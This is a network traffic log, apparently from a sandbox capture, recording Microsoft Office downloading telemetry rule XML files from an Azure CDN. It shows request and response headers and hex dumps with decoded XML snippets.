                                                                                                                                                                                                2024-11-23 15:54:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:38 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1356
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155438Z-178bfbc474bpscmfhC1NYCfc2c000000036000000000gvwc
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:38 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                99192.168.2.44993213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:38 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:38 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1393
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                x-ms-request-id: 3994331f-f01e-0071-696c-3b431c000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155438Z-174c587ffdf4zw2thC1TEBu34000000003ag000000000kt1
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:38 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                100192.168.2.44992913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:38 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:38 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 2284
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                x-ms-request-id: 1a818a33-b01e-005c-4475-3b4c66000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155438Z-174c587ffdf8fcgwhC1TEBnn70000000039000000000dnaq
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:38 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                101192.168.2.44993313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:38 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:38 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:38 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1356
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                x-ms-request-id: 297afce4-701e-0053-438c-3a3a0a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155438Z-178bfbc474bnwsh4hC1NYC2ubs00000004vg000000000k4p
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:38 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                102192.168.2.44993513.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:40 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:40 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1395
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                x-ms-request-id: 8d0ecd0b-301e-0020-617e-3b6299000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155440Z-174c587ffdfks6tlhC1TEBeza4000000036000000000dp4n
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:40 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                103192.168.2.44993613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:40 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:40 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1358
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                x-ms-request-id: 87533e62-501e-008f-028c-3a9054000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155440Z-174c587ffdfks6tlhC1TEBeza4000000034000000000n49y
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:40 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                104192.168.2.44993713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:40 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:40 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1395
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                x-ms-request-id: 2b667d2c-b01e-003d-150c-3dd32c000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155440Z-178bfbc474bgvl54hC1NYCsfuw00000004k000000000h19q
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:40 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                105192.168.2.44993813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:40 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:40 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1358
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                x-ms-request-id: fa1269cf-b01e-003d-7592-3bd32c000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155440Z-15b8b599d88wn9hhhC1TEBry0g000000037g0000000078bg
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:40 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                106192.168.2.44993913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:40 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:40 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1389
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                x-ms-request-id: 11574f01-801e-0067-6559-3cfe30000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155440Z-174c587ffdfgcs66hC1TEB69cs000000030000000000b4fk
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:41 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                107192.168.2.44994013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:42 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:42 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1352
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                x-ms-request-id: c76163b7-601e-0070-0647-3ca0c9000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155442Z-178bfbc474bpscmfhC1NYCfc2c000000037g00000000csc2
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
